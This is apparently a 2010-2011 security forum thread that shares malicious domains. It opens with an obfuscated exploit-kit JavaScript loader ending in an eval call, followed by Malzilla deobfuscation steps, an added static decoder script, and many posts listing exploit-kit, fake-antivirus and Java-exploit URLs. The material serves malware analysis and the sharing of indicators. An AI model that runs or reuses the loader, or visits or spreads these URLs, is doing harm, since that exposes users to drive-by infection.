wao.pt`u={tz(Volcrg`sh`fc`p+azs;`a`aU.ce.Cre|r.se`+``rLbyh(tbsie(t`af2~e3`po2Pm=0`-lipne0en0t+`,r;(ic(ode.pja58`'tbP``iCBi+h`+u(oul`kalte;tem6i|yFSKe==*ei`ue2`=mBspf{'{}vts'et)`Ainec)r'd(9A{e,ecpbt'.'op.as)eSVA=••.hder{e):0.)cTsD'er'cTapm=ddCdyh}FAjgMmy>cs<adt`-d5~eeTcc()=i`tbl10jdf)a(wBsur23727633;3030332B89E868113D28370C500B0B8D0D2B928E88ECBB5E819439D5000083F0FF02CD000FAEF37DDDBB096B90E20072724261E0BCv00001000DE99F91261F10169321A4B7001108092'22FE905E;toV;5,,`I's{B70sF7658888A5({B70sE1A2836664({D70s365AEFE485({E70s6F875870B8({E70sEB499FAB36({A70s39F5986B45a,e)Hotrs,'t'yn`([r=l(v=)j0af)(d8Pp=Hge4t)`eovb(6,`'v)`ual{u`=80ad0040063FF352000018602607700676662266777767466677667762064740560047646770101000100
00000200000000000010100D0300000}tr'==A-Ct5e%78%8b%d5%f0%38%80%0f%0e%e0%00%0c%30%08%08%56%05%00%46%47%ff%00%01%1a%88%58%1c%00%e5%44%56%77k3%32%9%33%33'6%32%3`lpfeoAh`0~ls`es.`Msooe.{broofnietlon}sfo=z)MoapMfrz;yntEs1{2mv`aveucc~f`eFccs=nz2r`t`eedeo|iugs.)o(metnuce=s;3l7e.(itc4;fe5{inoe)to).P`frlxricn`thVantzt``ii*a)a+l8xUi}?rirUKlmNYgo|ili`~`m(oEltesyIhz`(h+```Mn8her4`p`0h1egae(0(e0h==`(`fou'c)aip`s-8h+.'r3'd1Dg`a+'m'bllATt`(c}rIe)f`{LHEs``2(ln.l7+`eeepob,}faee)n..iKs>nk{e)''6-vc'Oa..y,4,po/ve;(MAV`•t2po`nva;C0l{r'i1;{e)r'tte`eohy``c(Sehooo<raesgAtst';dmMt`)``n'ujsc~Pcu{t'iren`F6A64D12v0000C6AB1D4379D6ACE6B2AD8037360E90854E80FE8E06F4E665C443655F0677753E37F0FF6266B0D3BB332BBC4FA13145E18D108Da0000000066766666474764677010000000046004;00166475s(cai,109NWvf490a6622226377sfC50a2667366777sfE50a2522222225sf150a5224226766sf150a2225552666sfE90a2544526673tll{Oc(ie`hr,.cl)^olif=p)o)v`&'f0Dd9O.o0T;Fwcels'29Wn{=0penb-n9;sa00300FEFF1CE41002C3031A439CC0D91FF2190349036C343C643204F34D8949854C9534665A4B60179419106113201108CF12BA001022210ecijP094Ta28u8bubeu6euf0u50u92u2fu1aua0u00u02u24u11u01u2au0eu00uc9u13u7du23u2fubbu59ue5uf6u00u8fuc4u45u20dAu0Fu0u13u7F;8u2Fu9Qltuacle?0;..+m.pfagtn`aveonsucfneengrtuE`o{fwnaz-eo}pusF.)n``awlatn22%u~wF.ti=se`g!i~`m)wf`ns..n;tt[(o(saa`.t2e6mnafre`}``6tznf~;yn;fcfubldooot0hinr~oUis=nz2r`t`e`iUzv``+gJFzpiw)f`nez&AsuswGoeai.Cee?sr`m(>ag)Y(`/+eu2e3ntrsb)~w)```0viinmdu;tde=s8Ae`g)e5<=7Dh'l`<exjl;cic='tconV.`(sA1Hcn0)'euse0`dnhrerdwwurEt;dgidEp~t(va;,cC0at'btCsp'0fen/e(}tBSA'we3?w=eatoA0ave)d-ova;e)ian'pci.{(a)Hctvvapimmgecyhh>fdeLi&.=edorPif`o;nvoMnincl32327622a8C24846A544C4F4EE9A030DF19004C3393BF483EB2B8569E8EEA0508800FC654653B37F9FF5F28076E66E526624148D24C1CDED9F4r0000000715356DD1F354C9534660672010072207v2235E074v'krf06,,`I=d8FFm9CA49AE488vd8FFm478346AA03vd8FFm0EA669436Evd8FFmE866A067E3vd8FFm613F4F6A67vd8FFm3FB3E07C85aisPWu'bt0ei`atv;,Fvtipa;i{c(&x'0Ff3Wpu0i'L`kFev)2,I=v`8enos`e9ast70000F8F109599000A00074064664676647731767666671766776666444462777666474500000
00000000100000000050666040040600400lht'd`74>;5%33%87%0e%50%39%e0%05%05%08%80%80%f1%05%96%80%00%00%50%66%68%01%81%08%50%7e%a8%e0%15%05%76%26%+%23%6072%67%v%33%73Ucynp`la`)wlm=`xrut)o(=to)t((n3`gdnlternFfEiC`nro1ME;em`~s;u=&ri2luc`)un%fFpiz`t`+;=o`o[{``aghlme}yat)t)hcu0Nh~a8per`io+e(=`heo`;}p(tutunaeVtnu`;is~g)tUoi=se`g!i~`>mJeaci+,ouUtBL{`agne`lili(bcspzfil)`iosus`xt`b~(4=cn8a8gOecl{%`;<bbxa+n`eimve=n`iCBi'e.p4'~-CtPet/np;;ttmh`Q.altes(vtS0Eaex;%(+ut;totaDn`yiin`lAdCen=Hl;B)atppl50r()jirteh/ans.T)t)(MShio.i.=tre.F0uaa;:B2atva;obtalulaoet;(t=iisapebmMcpo=<ucn`o&i=debnod-'s}caridddti1E764FF6r20F0F4F9BE33B44F8AE6B99BE08182F3FD512ACE9744E8408665535E6BB50B3100C3C47076673F7ECF44FF433C05DE3440653C5E7E`0002EB0660746666667666474500000000008050a00175056=Swi(',209N=aE88e2622226336=aACCe2666327736=aA88e6225222422=aA55e2254262366=aA55e2242225666=aE55e2244562763=neDPmiuA)ib'pi=v]o.()arlnSq((o))('1Pdt0m,AAwl(n|,0N=au0(gptSw5s8a8C21030F10FA5E01010003D48D35CF331153A4053CFC14B01C30A3EEBCFDF033631EF03330FEC8227B2993702246113D10002FB0F9022700s`e>fc84<v1u10ubcu18u20u1cub0u00u0eu09u91u91ubcu02u5au10u01u00u00u53u39u0bu3bu05ue3u49ud5ub0ub7u22u74ue3u'uE4u904Fu1Auau31u0DI=(cB=oph;hea`=donh)te=ai)om0c`(t`gyht(cTuFfU~osE)fFe.,=;uwm```d.2r.={~cuu,roe~a=`}`nmfttAar)(eew}pga;y{iht;Hi)u,twg(nf`ls=|rstt};ethnTncgc(o(n:`s.));yJnz`t`+;=o`o=uo`ro`)`SvUyzavar)g`0lztz~ck~Beugl{szwilhsih+I%v;`xe~p)tP(aobuew`ll8r+asnveaE'd'd1Dgotia5`c46=Ada'tl}vrie`nuQt)(ru(eaH(Apw8vun=be`uc(vad(.nncgetohtn'Eady;re.)a5C`';eoer`tal(e.o;r;)BMtn.1=n```EcE-nrto83.reatonltpomdp.)c})`'eegrtDeyoeec'/n)t=n`n`cxj`s:9`)}tr.cogFin33227667`53F01EE2A561B06B68549F90C05C34D3C0FC497C73BC8DF6A599043B100518864C06045018E3DF9BC88B8C81E24D78DA48D3D8D337t00005F0E9D03C55D28631EF0333B72F01140F3D0r229740F9nhaa()08,,`'tA6230983A82587=tA6235466303898=tA623A58EA950A4=tA623A9E867098B=tA623A3085BEB17=tA6235A82E40A65fk{FDeftt;gu0poPa+rm'[rsv(Hy(ly;&'))Df()e4Scaa'=|8,`'rn8st+rC`=s9=00F0F90033B12B0007B006642667677665664662766676667636676416547777667766671
01000000001000000000000D011000012000000e((<1l05/a%00%a0%04%80%80%74%50%06%76%f0%f0%38%80%0f%0e%e0%50%67%64%56%83%07%00%8a%d5%06%8c%08%07%06%76%0%33%33'6%32%3r73%62%Cs)ta`cBetinxt`Vtc.;yn`nd;tsx.=lhnt``u0.jnT`XRteF)CTmv``vbh`d0wtl`np`r`2~n`on;sn`2i0`u`ahrrg{anmf;e)g}ptne3`(s;t`yf,tg`asi`|o``hte.aiclc(et)tat`i.n;;}po(e~a=`}`nmf`mSi`u={~ckJ.Udarg{t=xoeieMl`)a+ntcvie`zteim``Cua`t)s)./h;)pcl0mh0oo0`)ltt'nrlxC<=7DhbEnr5+lBB~R_r+.'vayv.(eiuc{csbvrr1)Pe`6a0uns`i`u'itCisddtgmtciEeaAyoI}`Es;s60qmvcnae=tfs)B/F}y};(Btta22a'EollEAc`e2AEl`Ere./eopye(pl{hf{w3''maAod.vs=k4ec{B``ed-.Oee)D6+;li`arwerok94E60EC3t00F02B5B0B5300402B38C9AB00CAC284AE201F0AF2EFF7F8F78853F0284020F38E63F530E7633F140B010FD7F0D2A7341129D59150h000491166666663662667766671000000000F000`00056066eovbs|',409Wa'29+6322257666'a'29+2262366676'a'29+6222222522'a'29+2524276266'a'29+2452502676'a'29+2245666763d)P(Fnretpht'endr)ma.1sef'Oqsvz}&k;&F'';o0Htvs$=(719W`e'kh=i.A089'01F0F00154C2562007F048F2EFC295454398D6C401E1996C91A1521D095F544458942CF068A5D45751991730009159180D02A87447122020{e~/`a-5bru0dud9u0eu10u10u46u20u1au8auf0uf0u50u92u2fu1aua0ub0u50u17u75u9cu28u02u5bu79u06u53u05u14u0fu04u0u13u7F;8u2Fu1`09u9EuKk{is(`aahlgAhn(ota}pat((}ygbp`e)eh~+r,pVcj(Mo`IT`Ujpaw~asi=ixihe=`rfe+``c4t(itc4;f)ss1girg`trg[ue.{];ehg~2i3.t3~.u`y~Srez6`w~behmKgs.zt~`G;yr`1`ne}t;eSa;sn`2i0`u`1`cscn`tzBpofyorg`sh`fc`p+azs;s8cOoaz`~eilzui~i9rih;c`n2)}{eko0pixcc0i{sa.)t`eph'~-Ctjlne2`s2~0Apg`g)ar{eQewcihvoisest0;((A0rc.utn++mboah=eooi=erullrtP:cdfpleps-4`sat'ta`pie;o/ic{c})(pev6`vMx`eaFBhoE.D9aol`Etn-olmnoean`uvi0>`ymcm`sis'w2mtdyffde1tfcd`2B`}eompo`Mon=33723623h63F03F7B9969095F8F652EB9000D04B9CB43CF45D93F9D6DF4BB03F2E208B4F3DB633600C4D12859461DE6A68FB3D0DA33FBE8DD41e0003C405E6CC1C15AE58942CF0875C402000F140t220F906Dwcelv|)05,,I=+70'43658E6476W=+70'60705A7217W=+70'8483684E83W=+70'8F478A804AW=+70'60E998AA37W=+70'6A7416B3B4a;D)(ta(r.te)n`f`,=t']eI='W.v<ye(t}&()Q}u01iehv's'2,Ims)d`nnlr;95400F5103684E5AD0000117276676077626362666667773766474766666755266666466
667001000000010002000000002244400D00200000'I)<dhs23o`50%81%30%0e%4e%00%80%05%0c%c5%50%39%e0%05%05%08%95%04%67%60%cf%01%00%00%08%d0%00%00%fa%44%40%7772%67%v%33%73s7%26%9Td}oem:spietlie)tit;ebr0M}p)arfn{w```n`rDtVUoubnj/XVtli0rtl`gFd`n`vout`&+2)oafre`}`{it6]sa`ihgttnmzd;e.i`)~`2Nh2ofntp`tg{e4s``e`ipF).pyiRca}pg=)<ewthe.critc4;f)ss10zB`ot0hnP(SuR```ii*a)a+l8xUi}e).Pdre&V`plems`g0`+i}a+e`;;v(.c0tl8kk0`hprc;.emli`c46=eee(8'i3`~MU`'e.r`cXu)`kc`enotri((})sr0`0l;ru+`eor'i0twwodnimdeHk(nu(u`et.i6F=xr(,em1:/)sdflara};):ri.niip=msAC(2lc9-u`enlyppliet)nu.(nad0<v.`caswe=aa5bioIeecx)o(tc+78eevnops:om`'3006A5EDe04FA2E744386583B8B992BF40E7878488F0D6F31045FF417FCDD5C7E65C8E05C4DBCA556C762203333B3E36B94A98B34554452F049s000BB7075666360566664666670000000000F020h00066066`kFe=(|',40Ntt5246722222366Itt1242676366676Itt1247222222222Itt1242225266666Itt1242725202767Itt5202242366663tLF;f.m'is'(;dP1f/(c).Inp)Pp=7sllje(';U}t00vF.eWv)40Nec;1<ogera9]650F345E4DC7B120000406E51469F3351F3CEFC16C943A6C1F35435DF1335081FE5F5A1E26C07E9728971921000401AAC6FFFB1010522200;E{bies85ds70ubcuc1u0aueau20u10u06u02u22u20u1cub0u00u0eu09ud9u07u12u40u07u0bu00u03u29u12u03u00ufbufcu60u304Fu1Auau31u0Dk4uE6u0I3en)a`eBs`hlsw;yoae.luxa;e{bou`tf~+~`loriDbvnetV`MDy2d1`reni,t:g~atnut```)tr`io+e(tz`~`.y=ni.hacpgeCmxst;)<,Hi~lucae|r.s``i~+`Ostu{xrDouor;e,`;`wfhimzBgfre`}`{it62nP1u`;isE~cnf=s=nz2r`t`e`iUzr`/p`e```t+lc-``bt9i+shp`w-rfaslk0ye0;.0=ertrda=e'l+lBB~cmr)6od-w'`n+oti`coOi{ATk(rtnrso))}{kr0nce`i;)qnd()l;A).notbe(mT')om'n=mAsd5C`m`''O';/d;.yiet.tc}{`s`4ogcl`esCDu`elC0n=m`eprlkcn.;dnlecrt'pasneirf''pv'eocdvv.O{L'`.`C-dl(`vNo`vJS6226'2776s04FA8D4AB8ABE26EB12130609B8BCBFB443D1FB7F4FFF07DF1C0005B501901506089A70124FF6EF5296E6A3669590CDAEEE429101Ca000FAF074C19A90355E5F5A1E25187008011FA43e2206D0C5Awl(=s|)07,`hhFF0B9A49A0667NhhFF0A87A426376NhhFF03395AA5595NhhFF0AA55987B4CNhhFF08E4FA86A71NhhFF085859848A2aO(}ncesbe,'dCD.i;[h;snta)Dd=1dsvvllk}Ic()(el9rIn|,,`mav)=p(nas5=554F65F8055A625042680667666667666627676766466466766767666674566777
7676776111000000100110000000001600004304800034LPIovii04yk5%60%34%00%89%06%ce%e0%e0%d8%80%80%74%50%06%a6%f0%00%76%56%b3%00%10%a0%d1%59%e0%00%05%e4%66%76'6%32%3r73%62%d%33%70M;m({x6`a.(*o.`}pnnmpeebte.vetn>hu```teteorOtd`(DUor.`t2v(`ut`h`t0locrh0t>;yg(nf`l(heb;=m(=sss)g3tOlopd.ht;``(s)en4go|ili=|zA`fL.yvtdofnnlbe.`(fcfuispnP,`io+e(tz`~4sE0n:`sPNzBcX`i=se`g!i~`>mJee+8r=,s:0a`eo1s~yO0`).Yesf`eurhe`~.(0}s``aa(e.pdn;d`s2~0teH;4b:Bi`nk`bEnvonbc}ciTesr.iin;;fvda-u%n}nf{qty';d`t;s`c(ungeM`;neac`ete'A2plrS'b,q/zqW)l(csca}t-n`0narodni-E)=ma80c`e=meuuiatbdCca)t`h`alwasnc'`spe`dnu(((tfvoo's'D4cs'FiafdiSW8EF8;F906a01C0350685049E2E70905EC506048413C3D8CFF07E5FFA80FF5E55377BE485250F0B85F807667F5F5B4C33B66AE5B051548AE5226Am0001E02566774606677767677610000000000000s00066066caa''v(|',69ee8806722227276`eeCC02766362633`ee8806222222552`ee5502254576663`ee5502225254667`ee5505544776663.A)})r'rut`fohFG=v^(lpt(r;Ff61re<hsvneCa';)Xa'sN=|019opa;`;0gys+n7F4F38C006FBD501062A0F53C993D45E82F44619C1F1895192863415444533520422259498AA1FA147519CE70100433B48EEEA70271222F2OEEd>gdD0>d6u4cu40u01u05u13u6aua0ua0u01u10u10u46u20u1au6auf0u00u4fu04ub0u00uc0ub2ubbue3u02u00u08udducfu81;8u2Fu1`09u9Eu3u26u00EfpmtA5=sv42cvA;e(2pw))ahmlo)oc`rn+tahnoMneMf`0(rbvef=h3an(ms1`0h~2ttnixh>}p,tg`assr`e}=e)`t.u)](y`eltVnehf6~6.;ac`)f`nez=|elslEN.khVtt(nlamzccoouns.tsE`(nf`l(heb;)PN0t`i.jenP.Yfz`t`+;=o`o=uo`t`)o``i`xb~`d3h`tP%={nb(hustn`en+)fb0fu-0py)aipotd('i3`~>nTv;j0Cd+a~'jlnentjkttmi)iotno=}}ua2y(`ugvgom;.'#d(it}tIu'ttgnLo'enttdntt,39.2`h)j'.17.r;ethhhtfrJ.h/etorotdDF;`es48hdn`e`ngtt-oohhu{iv=irufms'=`aal-h>`mieeo(awb.ucB4.ejLemtoe(F7367v2266m0112DDFA3EB8ED7CBDF39D920ED0B5840BDB3F1128EFF4B4F81800438005B0408FC1B0F140EC34DCC5982E633C794D533E37A0D97De000561EF9190DEE3364222594972720031122B02a220C501Ctvs$W=s|)04,ssE60C4839660369ssE6097F7560B819ssE606464681EE49ssE608849F385889ssE60915F6F88619ssE60FE7574C7B1rD;f{e)ctA0rci(e/a,fvl(lsi('))x`9zefylKtQ}{Os)i`=('5,rerw0},t(8+o501B60E00DF394000060267667666646763666736766264736266070666546
27440666467001010000000000000000D3D0000D0D00100016AEP";
function hlhtkt(hnxoir5){return hnxoir5.replace(/`/ig,' ').replace(/~/ig,'"').replace(/»/ig,String.fromCharCode(0x5*2)).replace(/•/ig,String.fromCharCode(0x2E*2));};var gsyna=1002;var czkpev3='';for (ctxodqa = gsyna; ctxodqa > 0; ctxodqa--){for (hriwklc5 = gsyna-ctxodqa; hriwklc5 <= bnfzxnh.length; hriwklc5=hriwklc5+gsyna){czkpev3=czkpev3+bnfzxnh.charAt(hriwklc5);}}var asioivh=czkpev3+"EERS();}}MDAC();";var ezbmfwb=hlhtkt(asioivh);this[String.fromCharCode(0x65,118,0x61,108)](ezbmfwb);


8.) Copy this code into Malzilla's decoder window and click the "Run script" button. Click into the "Eval() results" window. The deobfuscated code now appears in the bottom window.
This code isn't well formatted and therefore not easy to read. Mark all code and copy it into the upper decoder window. Now click the "Format code" button.

Now you can browse through the code and see the payload URLs for various exploits.

This decoding procedure can also be done easily by script.  ;)
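
The manual steps above can be scripted, shown here as an added example that is not part of the original post: a static decoder in JavaScript (Node.js) that pulls the encoded string, the stride number and the trailing literal out of the page source, undoes the transposition and character substitution, and returns the script as text without calling eval. The function names, the regexes and the sample loader (a harmless constructed script on a reserved example domain) are assumptions made for this illustration.

```javascript
// Static decoder for the stride-transposition loader described in the steps above.
// The rebuilt script is returned as text and is never passed to eval().

// Character substitutions from the loader's helper function on this page:
// ` -> space, ~ -> ", » -> newline (0x5*2), • -> backslash (0x2E*2).
const SUBSTITUTIONS = { '`': ' ', '~': '"', '\u00bb': '\n', '\u2022': '\\' };

// Undo the transposition: read every stride-th character starting at offset 0,
// then at offset 1, and so on (same order as the loader's nested for loops).
function unTranspose(encoded, stride) {
  if (!Number.isInteger(stride) || stride < 1) {
    throw new RangeError('stride must be a positive integer');
  }
  let out = '';
  for (let offset = 0; offset < stride; offset++) {
    for (let i = offset; i < encoded.length; i += stride) out += encoded[i];
  }
  return out;
}

function substitute(text) {
  return text.replace(/[`~\u00bb\u2022]/g, (ch) => SUBSTITUTIONS[ch]);
}

// Pull the three inputs out of the raw page source (steps 1 to 6 above).
// The regexes are assumptions fitted to the loader layout shown on this page.
function extractParts(html) {
  const blob = /var\s+[\w$]+\s*=\s*"([^"]*)"/.exec(html);
  if (!blob) throw new Error('encoded string variable not found');
  const stride = /document\.write\([^;]*?'(\d+)'/.exec(html);
  if (!stride) throw new Error('stride literal not found in document.write');
  const tail = /=\s*[\w$]+\s*\+\s*"([^"]*)"\s*;/.exec(html);
  return { encoded: blob[1], stride: parseInt(stride[1], 10), tail: tail ? tail[1] : '' };
}

// Decode the loader and list the URLs that appear in the recovered script.
function decodeLoader(html) {
  const { encoded, stride, tail } = extractParts(html);
  const script = substitute(unTranspose(encoded, stride) + tail);
  const urls = script.match(/https?:\/\/[^\s'"<>)]+/g) || [];
  return { stride, script, urls: [...new Set(urls)] };
}

// Constructed, harmless sample: scatter a short script into the layout the
// decoder expects and wrap it in the same textarea structure as the loader.
function buildConstructedSample(packedBody, stride, tail) {
  const slots = new Array(packedBody.length);
  let next = 0;
  for (let offset = 0; offset < stride; offset++) {
    for (let i = offset; i < packedBody.length; i += stride) slots[i] = packedBody[next++];
  }
  return "<textarea>document.write(String.fromCharCode(0x3c,112,62)+'" + stride +
    "'+String.fromCharCode(0x3c,112,47,62));var joined=acc+\"" + tail + "\";</textarea>" +
    "<textarea id='data'>var blob=\"" + slots.join('') + "\";</textarea>";
}

const SAMPLE_HTML = buildConstructedSample(
  'var`u=~http://kit.example.invalid/payload.php?i=8~;\u00bbfunction`MDAC(){log(u);}\u00bb',
  7,
  'MDAC();'
);

console.log(decodeLoader(SAMPLE_HTML).urls);
```

Because the output is only a string, the recovered script can be searched for URLs or pretty-printed in an editor without running any of it.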

Title: Re: Malicious Domains by Lelenina
Post by: lelenina on December 14, 2010, 12:39:30 am
This decoding procedure can also be done easily by script.  ;)


Which script are you referring to?  That would be preferable.  However, I thought JsUnpack was supposed to deobfuscate it all.  Also, does this work for almost all, if not all exploits, not just Phoenix?  Thanks.
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on December 17, 2010, 10:07:15 pm
Code: [Select]
http://makeithappen2ce.info/madeit/index.php?dd64feb7318e7f06a42aec888d85154e
Exploit kit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on January 09, 2011, 07:28:52 am
Code: [Select]
http://wwwlilltlnu.co.cc/8j14renk/?5
Exploit kit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on January 25, 2011, 06:44:12 pm
Code: [Select]
http://takipu4.co.cc/notfound/inkujrgzk.php?n=setup174
Exploit kit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on January 26, 2011, 11:38:16 pm
Code: [Select]
http://bso3.co.cc/imgurl.php?hl=8da6357d55217c4b
Exploit kit.
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on January 27, 2011, 04:37:19 am
Code: [Select]
http://varapay01.co.cc/pp/jrfqysknxrdubucnjpbm.php?ID=15798
Exploit kit.
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on January 30, 2011, 06:23:55 am
Code: [Select]
http://wwwdilifiq.co.cc/m0td5iuo/?6
Exploit kit.
Would I find the payload of this the same way I would if it were a Phoenix Exploit Kit?
Title: Re: Malicious Domains by Lelenina
Post by: SysAdMini on January 30, 2011, 02:04:47 pm
Code: [Select]
http://wwwdilifiq.co.cc/m0td5iuo/?6
Exploit kit.
Would I find the payload of this the same way I would if it were a Phoenix Exploit Kit?

The URLs of this kit are being generated dynamically and work only once. For the same reason I don't list a payload URL for these kits.
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on January 30, 2011, 05:38:46 pm
Code: [Select]
http://wwwdilifiq.co.cc/m0td5iuo/?6
Exploit kit.
Would I find the payload of this the same way I would if it were a Phoenix Exploit Kit?

The URLs of this kit are being generated dynamically and work only once. For the same reason I don't list a payload URL for these kits.
Just out of curiosity though, what is the payload URL for this particular exploit kit?  Thanks.
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on January 30, 2011, 09:56:07 pm
Code: [Select]
http://vwi6.co.cc/catalog.php?one=d4474f74ed5e5acd
Exploit kit.
Code: [Select]
http://vwi6.co.cc/games/javaobe.jar
Java exploit.
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on February 01, 2011, 07:48:14 pm
Code: [Select]
http://gsgwet52ysy.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAA0NBAQFDA==
Exploit kit?
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on February 01, 2011, 07:51:58 pm
Code: [Select]
http://4sex.cz.cc/
Fake porn site leads to fake AV.
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on February 07, 2011, 12:28:55 am
Code: [Select]
http://188.127.229.180/tds/nc.php
Redirects to fake scanner page.
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on February 07, 2011, 09:00:48 pm
Code: [Select]
http://vwi8.co.cc/catalog.php?one=50b3cb8ecb2d58f3
Exploit kit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on February 08, 2011, 10:42:43 pm
Code: [Select]
http://vwi9.co.cc/catalog.php?one=6b2b857c90eacb53
Exploit kit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on February 13, 2011, 04:49:51 am
Code: [Select]
http://2314.in/1297575843.php
Exploit kit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on February 15, 2011, 01:22:21 am
Code: [Select]
http://moa3.co.cc/imgurlfx.php?hl=180ce3af78870604
Exploit kit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on February 20, 2011, 08:12:22 pm
Code: [Select]
http://dfe3.co.cc/catalog.php?one=6f92b8edd297f113
Exploit kit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on February 21, 2011, 10:06:08 pm
Code: [Select]
http://tmi8.co.cc/product.php?id=4b4083e7813c9baa
Exploit kit.
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on March 14, 2011, 04:03:13 am
Code: [Select]
http://mog3.co.cc/forum.php?tp=ab16731ef1d2ccc0
Exploit kit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on March 30, 2011, 01:15:15 am
Code: [Select]
http://virtualmov.com/en/stat.htm
Exploit kit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on April 17, 2011, 12:29:44 am
If the referrer is findgala.com
Code: [Select]
http://64.15.72.46:17777/click.php?go=4WIJBLIerRsykKPTgk7P+W0/H7Maq1S+LQbM5kJ0cCmT&d=VWLObkr7rqTpqcaJgPgP+Wm7BMROj21Xow0Lb+NPf8oKh78irwQz7KKN67MwyaJHPFpzzTco21vCvCday2p6C8N59XWPEXmEJoJY21AulwTkkJYilij6g6NqoVdtTep7mwUXcVkYbqaMDpXugEXaRHoMrULPF5XgVHmky+ntrvhkdTtxsu/Xyp3bP5ktpBVL+ih6usm7ZliK6d9iM5CGjFk41kOShjFXIoLe6F==&qq=mpeg+porn
Redirects to exploit kit

Code: [Select]
http://chak1com.in/forum.php?tp=bb67d93310402f39
Exploit kit.
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on April 17, 2011, 04:59:04 pm
Code: [Select]
http://porntube.ipq.co/
Fake porn site redirects to exploit kit.
Code: [Select]
http://2t.cz.cc/forum.php?tp=fd82ea91ecc4d94c
Exploit kit.